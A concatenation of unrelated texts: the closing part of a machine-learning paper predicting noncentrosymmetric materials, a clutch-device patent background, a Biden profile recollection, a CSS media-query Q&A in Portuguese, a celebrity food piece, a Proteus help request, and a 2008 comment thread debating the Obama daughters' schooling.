Range Number Range of Atomic Number 19 Maximum MeltingT Maximum Melting Temperature 75 Mean NValence Mean \# Valence 50 Range NsValence Range of \# Valence s-orbitals 63 Mean NdValence Mean \# Valence d-orbitals 48 Minimum NsValence Minimum \# Valence s-orbitals 43 Maximum Electronegativity Maximum Electro-negativity 49 Maximum NsValence Maximum \# Valence s-orbitals 20 Range MeltingT Range of Melting Temperature 76 Avg\_dev NValence Mean absolute deviation of \# Valence 88 Avg\_dev NpUnfilled Mean absolute deviation of \# Unfilled s Orbitals 4 Avg\_dev Number Mean absolute deviation of Atomic Number 52 Avg\_dev NsValence Mean absolute deviation of \# Valence s-orbitals 10 Avg\_dev MendeleevNumber Mean absolute deviation of Mendeleev Number 69 Mean NfValence Mean \# Valence f-orbitals \[table:importance\] : Top 15 features in noncentrosymmetry prediction Predicting new noncentrosymmetric materials ------------------------------------------- To identify interesting hypothetical new NLO noncentrosymmetric materials, we applied our RF-based noncentrosymmetric materials prediction model to screen the two million hypothetical materials generated by our Generative Adversarial Network (GAN) based new materials composition generator [@dan2019generative]. After predicting the probability of each candidate belonging to noncentrosymmetric materials, we sort them by the probability scores and report top 20 hypothetical noncentrosymmetric materials with 2, 3 and 4 elements here in Table \[table:Score\]. Furthermore, as we mentioned above that most borate materials are NLO materials. So we also reported top 20 borate materials with highest proability here. Please note that materials containing lanthanide and actinide elements have been filtered in these results because they are very rare. 2 element score 3 element score 4 element score Borate Score ----------------- ------- ----------- ------- ------------ ------- -------------- ------- Li4Ge 0.935 AlCuSe3 0.960 LaCeNdS4 0.975 CB2O6 0.840 Cu2S3 0.875 Cu2AsS3 0.955 LaCeNdSe4 0.965 N2B4O7 0.715 NO5 0.835 Cu3As2S4 0.945 CeNdEuS4 0.960 CB4O6 0.700 Li4Pb 0.830 Y2CeO5 0.945 CuZnInS3 0.955 S3B2O8 0.670 Li4Sn 0.800 CeTb2S4 0.935 AlCuZnTe4 0.925 CB2O4 0.665 Cl3S 0.745 DyErC3 0.930 MnNiAgSn 0.925 NCB4O6 0.665 SbC 0.740 MnDy2S4 0.925 AlCuInSe2 0.915 CoIB4O6 0.660 Pd2S 0.735 LaSm2S4 0.920 MnCoRuSn 0.915 EuB4O6 0.655 AsC 0.720 ZnGaSe2 0.920 LaNdUTe4 0.915 ZnSnO6B4 0.650 SeO6 0.715 AlCu2Te3 0.915 Cu2ZnInS6 0.900 As2B2O7 0.635 Ni3Ge2 0.715 AlCu2S4 0.910 NiCuSnSe3 0.895 PB2O6 0.630 Cl5S 0.710 CoCd2S3 0.905 MnCoAgSn 0.895 ZnB2O4 0.625 Zr2S3 0.695 NbSnIr 0.900 TiCoRhSn 0.880 SB2O6 0.620 S2O5 0.690 NbWTe4 0.900 MnFeSbO6 0.875 MnZnLaEuO6B2 0.610 LiOs 0.690 VSnAu 0.900 MnCu2AgS4 0.875 Zn3SB2O6 0.600 NH2 0.690 CrCu2S3 0.895 FeLaPbO6 0.875 Sr2TaB2O6 0.600 CrI 0.685 SnTaOs 0.890 V2Ni2RuSn2 0.875 PbB4O6 0.595 F3N 0.680 NdDySi3 0.885 MnFeBi2O6 0.875 AlB2O4 0.585 Cl6S 0.675 Dy2GeS4 0.885 TiCoBi2O6 0.870 NbRuCl2B4O6 0.585 S2O3 0.660 Mg6MnSn 0.885 SrLaNdS4 0.865 C3B4O6 0.580 \[table:Score\] : Predicted hypothetical noncentrosymmetric materials with 2, 3, and 4 elements and predicted noncentrosymmetric borates (only top 20 are listed here) As shown in Table \[table:Score\], the probability score range of top 20 2-element materials, 3-element materials, 4-element materials and borate materials are 0.935 to 0.660, 0.960 to 0.885, 0.975 to 0.865 and 0.885 to 0.670, respectively. It is clear that the predicted noncentrosymmetic probabilities of 3 element materials are higher than those of 2-element materials and 4-element materials. As those material are generated and hypothetical, we can only give the predicted noncentrosymmetry scores, which may guide experimental work to verify them in future research, which may further validate the effectiveness and the predictive capability of our models. More prediction results can be provided by the corresponding author upon reasonable request. Conclusions =========== Computational prediction of noncentrosymmetry of a given composition can be used for fast screening new nonlinear optical materials. Here we developed and evaluated two machine learning models including a Random Forest Classifier and a neural network model for computational prediction of materials noncentrosymmetry given only their composition information. By using the Magpie composition features, our best prediction model based on Random forest can achieve an accuracy of 84.8% when evaluated using 10-fold cross-validation over the Material Projects database. Further experiments showed that when the prediction model is trained only on 3-element samples, it can achieve even higher performance for the test set, which is made of mostly 3-element materials. A feature importance calculation shows the top six contribution factors for predicting noncentrosymmetry, many of which are related to the distribution of valence electrons. which is consistent with current physichochemical principles. Our developed model can be applied to discovering novel nonlinear materials as we conduct large-scale screening over two million hypothetical materials. Author contributions ==================== conceptualization, J.H. and J.L.; methodology, J.H., S.Y., Y.Z., J.L.; software, Y.S., Y.Z., J.L.; validation, Y.S and J.L.; investigation, J.H., Y.S., J.L.; data curation, A.N. and J.L.; writing–original draft preparation, J.H., Y.S., and J.L.; writing–review and editing, J.H.,Y.S., J.L., M.H.; visualization, Y.S.; supervision, J.H. ; project administration, J.H.; funding acquisition, J.H., M.H. and J.L. Acknowledgements ================ Research reported in this work was supported in part by the NSF and SC EPSCoR Program under award number (NSF Award \#OIA-1655740 and SC EPSCoR grant GEAR-CRP 2019-GC02). The views, perspective, and content do not necessarily represent the official views of the SC EPSCoR Program nor those of the NSF. This work was also partially supported by NSF under grant 1940099 and 1905775. The authors declare no conflict of interest. Data Availability: The data required to reproduce these findings are downloaded from Materials Project database at https://materialsproject.org/. [10]{} Kang Min Ok, Eun Ok Chi, and P Shiv Halasyamani. Bulk characterization methods for non-centrosymmetric materials: second-harmonic generation, piezoelectricity, pyroelectricity, and ferroelectricity. , 35(8):710–717, 2006. P Shiv Halasyamani and Kenneth R Poeppelmeier. Noncentrosymmetric oxides. , 10(10):2753–2769, 1998. Walter Kohn. Nobel lecture: Electronic structure of matter—wave functions and density functionals. , 71(5):1253, 1999. Hossin A. Abdeldayem and Donald O. Frazier, editors. . Research Signpost, 2007. Angelo Ziletti, Devinder Kumar, Matthias Scheffler, and Luca M Ghiringhelli. Insightful classification of crystal structures using deep learning. , 9(1):1–10, 2018. Kevin Kaufmann, Chaoyi Zhu, Alexander S Rosengarten, Daniel Maryanovsky, Tyler J Harrington, Eduardo Marin, and Kenneth S Vecchio. Crystal symmetry determination in electron diffraction using machine learning. , 367(6477):564–568, 2020. A Diatta, J Rouquette, P Armand, and P Hermet. Density functional theory prediction of the second harmonic generation and linear pockels effect in trigonal bazno2. , 122(37):21277–21283, 2018. Bart[ł]{}omiej Dec and Robert Bogdanowicz. Dft studies of refractive index of boron-doped diamond. , 10(2):39–41, 2018. Artem R Oganov, Chris J Pickard, Qiang Zhu, and Richard J Needs. Structure prediction drives materials discovery. , 4(5):331–348, 2019. Zhuo Cao, Yabo Dan, Zheng Xiong, Chengcheng Niu, Xiang Li, Songrong Qian, and Jianjun Hu. Convolutional neural networks for crystal material property prediction using hybrid orbital-field matrix and magpie descriptors. , 9(4):191, 2019. Kam Hamidieh. A data-driven statistical model for predicting the criticaltemperature of a superconductor. Technical report, Statistics Department, University of Pennsylvania, Wharton, PA, 2018. Kamal Choudhary, Marnik Bercx, Jie Jiang, Ruth Pachter, Dirk Lamoen, and Francesca Tavazza. Accelerated discovery of efficient solar cell materials using quantum and machine-learning methods. , 31(15):5900–5908, 2019. Benjamin Sanchez-Lengeling and Al[á]{}n Aspuru-Guzik. Inverse molecular design using machine learning: Generative models for matter engineering. , 361(6400):360–365, 2018. Yabo Dan, Yong Zhao, Xiang Li, Shaobo Li, Ming Hu, and Jianjun Hu. Generative adversarial networks (gan) based efficient sampling of chemical space for inverse design of inorganic materials. , 2019. Valentin Stanev, Corey Oses, A. Kusne, Efrain Rodriguez, Johnpierre Paglione, Stefano Curtarolo, and I. Takeuchi. Machine learning modeling of superconducting critical temperature. , 4, 09 2017. Kaname Matsumoto and Tomoya Horide. Acceleration search method of higher tc superconductors by machine learning algorithm. , 12, 06 2019. Logan Ward. A general-purpose machine learning framework for predicting properties of inorganic materials. In Pat Langley, editor, [*Nature News*]{}. Nature Publishing Group, 2016. Logan Ward, Stephanie C O’Keeffe, Joseph Stevick, Glenton R Jelbert, Muratahan Aykol, and Chris Wolverton. A machine learning approach for engineering bulk metallic glass alloys. , 159:102–111, 2018. Al’ona Furmanchuk, Ankit Agrawal, and Alok Choudhary. Predictive analytics for crystalline materials: bulk modulus. , 6(97):95246–95251, 2016. Gaspar Cano, Jose Garcia-Rodriguez, Alberto Garcia-Garcia, Horacio Perez-Sanchez, J[ó]{}n Atli Benediktsson, Anil Thapa, and Alastair Barr. Automatic selection of molecular descriptors using random forest: Application to drug discovery. , 72:151–159, 2017. Ian Goodfellow, Yoshua Bengio, and Aaron Courville. . MIT press, 2016. Zhidong Su, Yang Li, and Guanci Yang. Dietary composition perception algorithm using social robot audition for mandarin chinese. , 8:8768–8782, 2020. Weibo Liu, Zidong Wang, Xiaohui Liu, Nianyin Zeng, Yurong Liu, and Fuad E Alsaadi. A survey of deep neural network architectures and their applications. , 234:11–26, 2017. Weike Ye, Chi Chen, Zhenbin Wang, Iek-Heng Chu, and Shyue Ong. Deep neural networks for accurate predictions of crystal stability. , 9, 12 2017. Shaobo Li, Yabo Dan, Xiang Li, Tiantian Hu, Rongzhi Dong, Zhuo Cao, and Jianjun Hu. Critical temperature prediction of superconductors based on atomic vectors and deep learning. , 12(2):262, 2020. Yong Zhao, Yuxin Cui, Zheng Xiong, Jing Jin, Zhonghao Liu, Rongzhi Dong, and Jianjun Hu. Machine learning-based prediction of crystal systems and space groups from inorganic materials compositions. , 2020. Logan Ward, Alexander Dunn, Alireza Faghaninia, Nils ER Zimmermann, Saurabh Bajaj, Qi Wang, Joseph Montoya, Jiming Chen, Kyle Bystrom, Maxwell Dylla, et al. Matminer: An open source toolkit for materials data mining. , 152:60–69, 2018. Leo Breiman. Random forests. , 45(1):5–32, 2001. Andy Liaw, Matthew Wiener, et al. Classification and regression by randomforest. , 2(3):18–22, 2002. Zhuo Cao, Yabo Dan, Zheng Xiong, Chengcheng Niu, Xiang Li, Songrong Qian, and Jianjun Hu. Convolutional neural networks for crystal material property prediction using hybrid orbital-field matrix and magpie descriptors. , 9:191, 04 2019. Vivienne Sze, Yu-Hsin Chen, Tien-Ju Yang, and Joel S Emer. Efficient processing of deep neural networks: A tutorial and survey. , 105(12):2295–2329, 2017. Tian Xie and Jeffrey C Grossman. Crystal graph convolutional neural networks for an accurate and interpretable prediction of material properties. , 120(14):145301, 2018. Jasper Snoek, Hugo Larochelle, and Ryan P Adams. Practical bayesian optimization of machine learning algorithms. In [*Advances in neural information processing systems*]{}, pages 2951–2959, 2012. James Bergstra, Dan Yamins, and David D Cox. Hyperopt: A python library for optimizing the hyperparameters of machine learning algorithms. In [*Proceedings of the 12th Python in science conference*]{}, pages 13–20. Citeseer, 2013. Rimma Bubnova, Sergey Volkov, Barbara Albert, and Stanislav Filatov. Borates—crystal structures of prospective nonlinear optical materials: High anisotropy of the thermal expansion caused by anharmonic atomic vibrations. , 7(3):93, 2017. Zheng Xiong, Yuxin Cui, Zhonghao Liu, Yong Zhao, Ming Hu, and Jianjun Hu. Evaluating explorative prediction power of machine learning algorithms for materials discovery using k-fold forward cross-validation. , 171:109203, 2020. Matthew C Robinson, Robert C Glen, and Alpha A Lee. Validating the validation: Reanalyzing a large-scale comparison of deep learning and machine learning models for bioactivity prediction. , 2019. Jeffery J Maki, Martti Kauranen, and Andr[é]{} Persoons. Surface second-harmonic generation from chiral materials. , 51(3):1425, 1995.
1. Field of the Invention The present invention relates to a clutch switching device and to a twin-clutch type transmission. 2. Background Information As disclosed in Japanese Laid-Open Patent Application No. 2009-281570,clutch switching devices have been proposed that basically comprises a first clutch, a second clutch, a first release bearing, a second release bearing, a fixed sleeve, a first driving sleeve, a first moved sleeve, a second driving sleeve, a second moved sleeve, a first motor and a second motor. The first release bearing is coupled to the first clutch. The second release bearing is coupled to the second clutch. The fixed sleeve is disposed coaxially on the outer peripheries of both a first input shaft to which the first clutch is connected and a second input shaft to which the second clutch is connected. Also the fixed sleeve has a fixed location in a transmission housing. The first driving sleeve is rotatably supported by an inside periphery of the fixed sleeve. The first moved sleeve is threadedly engaged with the inside peripheral side of the first driving sleeve and a tip of which is linked with the second release bearing. The second driving sleeve is rotatably supported by an outside peripheral side of the fixed sleeve. The second moved sleeve is threadedly engaged with the outside peripheral side of the second driving sleeve and a tip of which is linked with the first release bearing. The first motor drives the first driving sleeve. The second motor drives the second driving sleeve. In this device, solely through independent rotational driving of the first and second driving sleeves by each of the motors, the first and second clutches, coupled to the first and second release bearings via the first and second moved sleeves, are turned on and off. In the clutch switching device disclosed in Japanese Laid-Open Patent Application No. 2009-281570, each clutch requires a respective driving sleeve and a respective moved sleeve, and moreover a fixed sleeve rotatably supporting these sleeves is required. Thus, the number of components is increased. Further, a configuration is used in which each driving sleeve and each moved sleeve and the fixed sleeve are disposed coaxially in nested fashion in order of diameter. Thus, there has been the problem of increased size in the radial direction.
On the day Joe Biden announced for president, I re-read one of my favorite articles about him. Brit Hume was a correspondent for ABC News in 1986 when he profiled Biden for The New Republic. Published under the headline “Mighty Mouth” in the September 1, 1986, issue, Hume’s piece expresses the strengths and weaknesses of Biden’s, shall we say, unique personality. The future vice president was 43 years old at the time. “The rhetorical fervor of his stump speeches and debating style,” Hume wrote, “have earned him the reputation of a man whose mouth often runs — and runs, and runs — well ahead of his mind.” “Mighty Mouth” isn’t available online. But a few choice quotes are enough to remind us that, while the world has changed, Joe Biden has not. For instance: “Biden has long had a considerable reputation among Capitol Hill reporters for enjoying the sound of his own voice.” And: Still, it [a speech against Attorney General Ed Meese] reinforced the impression of Biden as a man who does much of his thinking out loud and sometimes has difficulty figuring out what he thinks. And: It suggests that a Biden campaign for the presidency would be colorful, newsworthy, and, unlike his oratory, brief. But the best part is Hume’s description of his interview with Biden: ‘I just want to find out why you don’t like me,’ he said at the beginning of that chat in the Senate dining room. It was an awkward and extraordinary conversation, in which Biden finally asked if the reporter [Hume] harbored any ‘deep personal antipathy.’ He was assured that there was none. ‘Then what is it you don’t like?’ he asked. ‘Senator,’ came the reluctant reply, ‘I think you’re a windbag.’ Biden seemed greatly relieved, laughed, and said he thought there was truth to that. As always, Brit Hume tells it like it is.
Q: Qual é a diferença entre max-width e max-device-width? A pergunta é exatamente a que está no titulo,referente ao uso dos media queries estou com a duvida pois em exemplos de alguns sites eles usam algo como: @media screen and (max-widht:x) e em outros [...](max-device-width). Aproveitando a pergunta como faço pra definir o media query na tag link? A: max-width é a largura da área de exibição de alvo, por exemplo, o navegador. max-device-width é a largura de toda a área de renderização do dispositivo, ou seja, a tela do dispositivo real. Copiada de SO-EN Faz sentido...
Emily Ratajkowski is proving that supermodels come with a giant appetite. The 28-year-old may be known for her super-lithe frame, but this is one fashion face who’s ready to show how she fuels her body. Emily has taken to Instagram with a very food-centric moment – fans who have yet to see the images should prepare themselves for a little pizza craving. EmRata’s Instagram update today sent out two photos. Both showed the brunette seated at an outdoor table in a semi-shaded setting. The model didn’t appear to be in the mood for smiling – rather, Emily appeared very much focused on the pizza slice she was devouring. Her photo showed one hand holding the snack to her mouth, with eyes that were either giving off a direct gaze or almost closed – the second image very much seemed to be a candid moment. Either way, Emily was making destroying the cheese-and-tomato treat her focal point. Fans might, however, argue that Emily’s sizzling look was taking center stage. The Inamorata founder was rocking a slinky and spaghetti-strapped top in canary yellow, with a plunging neckline flashing the model’s cleavage. Emily was also braving a braless look, although this is one star who can definitely handle a challenging wardrobe situation. Emily appeared low-frills in her photos, with nothing but hoop earrings and chain necklaces accessorizing her top. Appetites are definitely a talking point in the modeling world. The stereotype that the industry’s super-slim faces practically starve themselves has been around for decades, although the stars dominating modeling these days seem out to prove that depriving themselves of food isn’t at all what goes on. Supermodel Kendall Jenner is known for her love of pasta and In-N-Out burgers. Emily has spoken about what she eats. Her Harper’s Bazaar interview chronicled exactly what she feeds herself with, although it did double up as a reminder that the model’s treats can get a bit confusing. “Every day I go to Blacktop Coffee and get this pastry called kouign-amannwith my black coffee. I always pretend that I don’t know what I’m getting. I’m like, ‘Um, hmm, I guess I’ll get … a kouign-amann?’ They’re like, ‘Uh-huh.'” Emily added that her midday meal is pretty ordinary, although she admitted to some perks of on-set dining during her shoots.
Vitual Terminal Of Proteus Is Showing Nothing We will be giving temperature sensors lm35,lm335 as input to adc of atmega 32. we designed the schematic and executed it on proteus. but the virtual terminal is not showing output. I am attaching dsn file. pls see and help us with it .help us with it
Update: Obama School Search Heats Up With Girls' Visit The Obamaschool search is heating up: Malia, Sasha and their mom, Michelle, spent two hours yesterday morning with their mom touring Georgetown Day School, and are expected to visit the Sidwell Friends campus today. The family look-sees follow Michelle Obama's trips to the schools last week, which sparked intense debate about D.C.'s public and private education. Looks more and more like the first daughters will attend a private school; no word if the family will drop by Maret -- reportedly still in the running -- later in the week. While it be wonderful to have the children attend public school, it may not be practical due to the security needs of the children and the impact on the school these extra measures would make. Then there is the issue of cost for all of this extra level of security. It is likely a safer situation to be in a school very used to high profile children with high profile parents. Too bad the media and terrorists will not give the girls the luxury to enjoy their new place on Pennsylvania Ave. It was never a problem in the 50's and 60's growing up with children of famous parents (Sam Rayburn, etc.) No police, no photographers, just a normal high school in suburbia. Too bad that era has been replaced by a far too negative an audience. There are now and always have been first class DC Public Elementary Schools. I went to one. There are many teachers who are dedicated, smart and caring. Security might be an issue on the secondary level but it is hard to justify security reasons to avoid public elementary school. Amy Carter attended DC public shools and so did Obama's best bud Warren (Buffet doncha know). It is a slap in the face to the people of DC who are working so hard for the school system if Obama sends his kids to Maret or GDS or Cathedral or some other exclusive school, but it is not surprising given how what a phoney "man of the people" Obama is. makes all the sense in the world to send the kids to private school. children of the first black president they can become a target. same with a private school but I'm inclined to believe security would be better. still amusing to see that there are haters of OBAMA who will criticize everything he does. Your opinion is irrelevant as of now. OBAMA won and that's that. It is a slap in the face to the people of DC who are working so hard for the school system if Obama sends his kids to Maret or GDS or Cathedral or some other exclusive school, but it is not surprising given how what a phoney "man of the people" Obama is. This is an absurd comment. DC schools are not uniformly good and everyone knows it --most parents agonize over sending their children to public schools in the district, even at the grammar school level. Security certainly is an issue and only someone predisposed to attack Obama would say it is a slap in the face of citizens for a President and First Lady to send their children to a private school. Are you envious of their ability to make this choice or simply partisan? If you are this pissy about the choice of school, you are in for a bumpy ride for at least 4 years! Could someone, anyone, please explain this whole "security is better in a private school" trope? How is it easier to secure a multi-acre, multi-building private school campus with 500-1000 students? Most DCPS elementary schools are single buildings with at most 200-300 students. Let's face it. The only thing that you all are afraid of is that the Obama girls will be exposed to inner city, lower class, black kids. ophelia3 the Obama's should make their decision as to where their daughters will attend school as parents, not as two very public figures. They should not have to place their daughters in a public school just to please you or anyone else. If they were my children, the only question regarding public vs private, would be which private school they will attend! Why would I be surprised to find partisan attacks even now that the election is over, considering the kind of commentary all the "patriotic" "Christians" flooded the internet with during the campaign cycle! Private schools that enroll children of high profile parents have sophisticated security systems, guards, personal security agents, and, in the case of the "First Children," Secret Service agents as well. The idea that a public school could afford to invest in that kind of security, or would want to subject their students, their families, and their staff and faculty to it, is kind of bizarre. Children of diplomats and other political parents are more used to security issues than most kids need to be, thankfully, so to subject them to it just to soothe partisans who will never have a kind word to say about our new President under any circumstance is pointless. If they sent the kids to public school, you would probably complain about the cost to the school district and the inconvenience to the employees, parents (security clearances to enter the building, etc.) and the kids. Some folks just want to trash talk and not think about what is safest for these children who will no doubt be subject to the same hostility and safety issues as their father. No one is under any obligation to sacrifice their children to make a political statement, which is exactly what the pro-public shool folks here are demanding. Grow up, get over yourselves, and mind your own business. The Obama's should choose the school they feel is best for their two daughters. Obviously security and privacy must be considerations but the overriding issue must be which school do they believe the girls get the best education. That school is almost certainly a private school. That is the reality of education in urban America. It would be wrong for the Obama's to sacrifice the interests of their children to make a statement about the public education system in Washington, DC The girls have been going to the University of Chicago Laboratory School already, if I recall correctly, and that's a private school operated by the U of C. It's not as if they were public schoolkids before. And I agree with those who say that it's better for them to attend a school that's accustomed to having the children of high-profile Washingtonians among their students. Though I suppose all the children at a public elementary or high school would benefit from heightened security. Let me count the reasons the Obamas will not be sending their daughters to DC Public Schools. The negatives are plentiful: --The average school building is more than 65 years old. Fixing all the infrastructure problems is pegged at $2 billion over 20 years. --Former Washington Teachers Union President Barbara Bullock and three others have pleaded guilty to stealing $4.6 million in union funds. Four others have been indicted. Bullock admitted embezzling more than $2.5 million during the six years she headed the union. --D.C. students performed poorly on the latest National Assessment of Educational Progress reading and math tests for fourth- and eighth-graders. --The city is looking at its seventh superintendent since 1995 with Michelle Rhee accepting the Chancellor position, replacing Superintendent Clifford B. Janey. Please be serious people, and try to find fault with President-Elect Obama somewhere where you don't sound or even look so incredibly foolish. OK. Now everybody who, if they were personally rich and had 2 beautiful daughters, would send their kids to DCPS instead of one of the best schools in this area, please, raise you hand. You in the corner, put your hand down because you are lying. And you with your hand up, well, you're go ahead and do that. Buckling under public pressure instead of picking what is best for your kids must be a difficult decision. The Obama's should send their children to whatever school they want - it' their choice and should not be construed as a political statement. With the number of threats already seen against Obama, I'm not sure I'd let them out of the house. There is just too many crazies that have already reared their ugly heads. I'm not sure how comfortable I would be if I was sending my children to a school already equipped with metal detectors. Let's be honest about this. Security is not the issue. The Secret Service is perfectly capable of providing security for the girls wherever they go to school. If the Obamas choose to send them to private school, it's because they'll get a superior education there. And it's the decision most D.C. parents who have a choice would make. The welfare of Malia and Sasha should be considerations 1, 2, ..., n. Satisfying politically-oriented critics should not be a consideration. Please, folks, try to think like PARENTS. I speak as the father of three successful grown daughters. Okay, let me get this straight: the Republicans who demand vouchers (so they can choose their schools) and HOMESCHOOL in mass numbers (because they want to teach creationism or whatever) do NOT want the President to have a similar choice. I think privacy is more of an issue than security. From what I've heard, Amy Carter repeatedly had the "paparazzi" tracking her every move as she went in and out of her public school. The media interest in the private lives of politicians and their families has only intensified in the last 30 years. These girls deserve to have as normal of a school life as possible and if that means sending them to private school where journalists can legitimately be banned from campus, then it's worth it. And yes, security is also an issue, especially given the number of threats, the president-elect has reportedly received. The Obama's should follow their best judgment and send their girls to a PRIVATE school. Security will be much better and their parents will have a PEACE of mind. These politically correct folks who want the Obama's to send their girls to a public school do not have the girls' best interest at heart and only want to fulfill some fantasy in their own mind. I went to private school and I should know. DC public schools generally STINK. Improve the schools in DC first then people may feel more comfortable. Everyone else should mind their own business about the Obama's choice of school There are now and always have been first class DC Public Elementary Schools. I went to one. There are many teachers who are dedicated, smart and caring. Security might be an issue on the secondary level but it is hard to justify security reasons to avoid public elementary school. Amy Carter attended DC public shools and so did Obama's best bud Warren (Buffet doncha know). It is a slap in the face to the people of DC who are working so hard for the school system if Obama sends his kids to Maret or GDS or Cathedral or some other exclusive school, but it is not surprising given how what a phoney "man of the people" Obama is. Posted by: ophelia3 | November 17, 2008 8:17 PM ----------------------- You're so full of it. The Obamas can send their children to whatever school they feel is appropriate. Some people just have a need to be offended by everything. basically... everyone always promotes something controversial by saying, "who cares!" until it affects them.. and all of a sudden, "NO FRIGGIN WAY!" you can campaign on saying that the country is run down.. but we need to "INVEST" in it.. but then the bottom line comes around.. okay barack obama.. put your money where your mouth is.. and suddenly it's, "well..uh... we.. uh... we are sending our kids to private school... only because we like their school colors.. it has nothing to do with the quality of the public schools.. uhh.. yea.. that's it.. it's only because we like their team uniforms...." yea right obama. you realize of course.. moronic and presumptuous decisions you make in issues like this can make or break all the other POSITIVE assertions you are making to appease BOTH SIDES OF THE AISLE here and trying to win over people... I could have sent my son to a private school but I chose my DC neighborhood public school because (1) I went to this school as a child and it still had a great reputation, good test scores and motivated principal & teachers; (2) my son could walk there (3) he had friends in the neighborhood who went there, all of whom also could have afforded private school; and (4) I wanted him to have a diverse class (this school has kids from every race, nation, economic background, creed etc.) and not be surrounded by privilege. DC has some good to great public schools. A little known secret is that high-performing graduates of DC high schools like Wilson and School Without Walls have a better chance of getting into great colleges than kids from private schools. Obama's daughters will get a great education no matter where they choose to go because no school would be allowed to let them down. And their safety will be as well protected in a public or private school. Choosing a public school would be a tremendous gesture of faith in DCPS that would do much to improve the quality of all the schools and give many DC kids a huge boost. I wonder if the Obamas realize how much good they could do for so many by making this choice. First, the decision of which school to send Sasah and Malia to is a private decision. The Obamas have to consider the safety of Sasha and Malia. That is paramount. Should they decide to continue with private education, that is their right as parents. They should not choose public schools just for political gain or to appease America. No one should use their children in that manner. The same way that I should not be able to to tell YOU which schools your kids should go to, YOU should not be able to tell the Obamas which school their children should go to. We are living in different times than the Carter Administration not to mention the surge of threats against the Obamas, which stem largely because of the color of their skin. The Obamas are for the people, and what school they choose for their girls does not change that fact. http://www.trailblazer-firstlady.blogspot.com I believe in public education and would only remove my children from public school if it were not meeting their needs. The Obama girls are definitely "special needs" children. Perhaps Senator and Mrs. Obama should phone Amy Carter and ask her to share memories of attending public school during her years at the White House. I recall many photos of her trudging down the sidewalk looking resigned to the presence of the Secret Service agents, and reports that she could not go outside during recess. Many of the private schools have a large campus to provide a buffer zone and allow high-profile students more freedom. If I were Michelle Obama, I would ask my daughters if they would prefer to stay in Chicago with their grandmother until the end of the school year. Probably they would say no, but they might like to feel they had the choice. Oh, please, WHO CARES??? These girls are 10 and 7, why is there so much scrutiny placed on where they go to school? It's a decision between them and their parents, doesn't make them any better or worse than us regular folks. Why isn't the media more focused on other things, like how the economy totally sucks right now and we have 2 wars going on. Let these kids be! Oh, please, really who cares? Leave these girls alone, it's a private matter. Aren't there more important things to scrutinize like the economy or the fact we have 2 wars and no money? Leave these kids be! I am a product of DCPS and I now have a 8 and 6 year that do not attend DCPS. My family is middle class and I started out in private school, but after my parent separation I started going to public school. For those of you who believe that DCPS are the same as when Amy Cater attended them, you must have just come from out of a coma. When my son was 4 and attending a DCPS, he walked out of school during the middle of the day and came home. I had to call the school to find out how and why my son was able to just walk out and no one noticed (not even his teacher). None of my children will attend a DCPS until they have made some major changes. My mom sent me to live with my God-mother so I can attend Wilson SHS. If DCPS are so great, why would my mom (a Black Woman) not want me to attend a school one block from my house (Cardozo). I think that if a 4 year could walk out of school and others can walk in thru other doors, then what makes the schools so safe? Grant it, I have friends who are teachers in DCPS and they want a change in the system, but many of them graduated with me and they did not attend their nieghborhood school as well. Having only a handful of good schools is not enough and if President-Elect Obama sends his girls to a DCPS then everyone is going to want thier kids there as well because they are going to feel that is where their kids are going to get the best free education. Oh yeah, can one of you thinks that Obama kids should go to DCPS tell me what DCPS did President Bush attend? I think I missed that and that don't seem to be an issue to you with all. My husband and I are both products of public school systems. He was educated totally by DCPS through High School. I attended DCPS for elementary school and then on to Prince Georges County Public Schools. Our daughter attends GDS and it would be great if the Obama kids joined the GDS family. I chose not to place my child in public school because the shape they are in. We all know it. Why should the President of the United States have his kids attend DCPS to prove a point. Mayor Fentey I get putting him on the spot, but the President, come on people. Obama's kids don't attend public school now so why would they change. Face facts a lot of these "great DC elementary schools" like Murch, etc are like mini private schools because of parent involvment, etc. GDS or Sidwell would be a great choice. "and ALSO, it SLAPS lower and middle america in the FACE because not only does barack obama have wonderful healthcare for himself and his family.. but he has his children in PRIVATE SCHOOLS...." You're way off. My mom is middle class and I went to Sidwell Friends (and had excelled heath coverage). There are grants and financial aid available at the K-12 level for students. I'm all for the Obamas sending Malia and Sasha to a private school. Let's be honest, the quality of education is far superior to any DCPS. When I left Sidwell after 9th grade, my mom moved us to Maryland because she didn't want to send me to a DCPS and even in a MDPS, I could tell the difference between a private school education and a public school education. I was at least 2 years ahead of the rest of my class and didn't feel the lessons challenged me enough (and I took AP classes). Any parent with half a brain would want to give their kids the best possible education. The people complaining are just fishing for something to bash Obama about and it's pathetic. Would we be having this conversation if it was Sarah Palin trying to determine where to send her kids to school? Everyone is talking so negatively about choosing to send ones own children to private school. Isnt that what America is about?? I myself, am a product of private school, though not through privelege but by the sacrifices of my parents. Let us not forget that even if parents decide to send kids to private school they still pay the same taxes as a parent who chooses the public school system. So not only do you get the benefit of someone paying there portion of property taxes for a child that doesnt even attend that school, you have one less child in an already overcrowded environment. Its about choice and everyone even the president has the right to make the one they feel is best!! No matter what school the Obama's choose for their kids, they will get criticized. If they have the means, and they do, then they should send them to a private school. The education and curriculum are better in private than public. Security wouldn't be an issue in either setting because of Secret Service protection. For those of you saying he is a hypocrite for sending the kids to a private school, get real. Even the mayor of DC sends his kids to a Private school. I went to Public school, not in DC thankfully, and I now send my kids to a private school for the superior education. Leave them alone. PLEASE PEOPLE GET REAL. THE GIRLS ATTEND PRIVATE SCHOOL IN CHICAGO - SO WHY SHOULD THEY SWITCH TO PUBLIC SCHOOL. I WORK IN DC AND HAVE FRIENDS AND FAMILIES THAT ATTEND THE PUBLIC SCHOOLS - LET'S BE REAL -THEY SUCK. HOWEVER, THERE ARE A FEW THAT ARE OK.WHAT RESEARCH PROJECT ARE PEOPLE TRYING TO FULFILL AT THE COST OF THE BEST EDUCATION FOR TWO GIRLS. THE PARENTS CAN AFFORD THE BEST AND HAVE PROVIDED THE BEST BEFORE HE WAS ELECTED PRESIDENT. PEOPLE IN THIS COUNTRY ARE ALWAYS TRYING TO TELL AND INSTRUCT EVERY ONE HOW TO LIVE. IT IS EASY TO DO WHEN HIS/HER TRASH(LIFE) SUCKS/STINKS. TAKE CARE OF YOUR HOME/CHILDREN. THAT IS ALL YOU NEED TO BE CONCERNED ABOUT. There are plenty of great DC public schools; I know because I have a daughter in one. But if the Obamas decide that a private school is best for their daughters, the issue is whether President Obama will support vouchers and charter school choices for DC parents who can't afford GDS or Sidwell. For him to choose a private school and oppose these options would suggest, at best, a blind allegiance to the NEA, and at worst, total hypocracy. ophelia3................do you have kids ? doesn't sound like it. Amy Carter went to public school in the 70's 70's 70's 70's 70's the climate was MUCH different then, 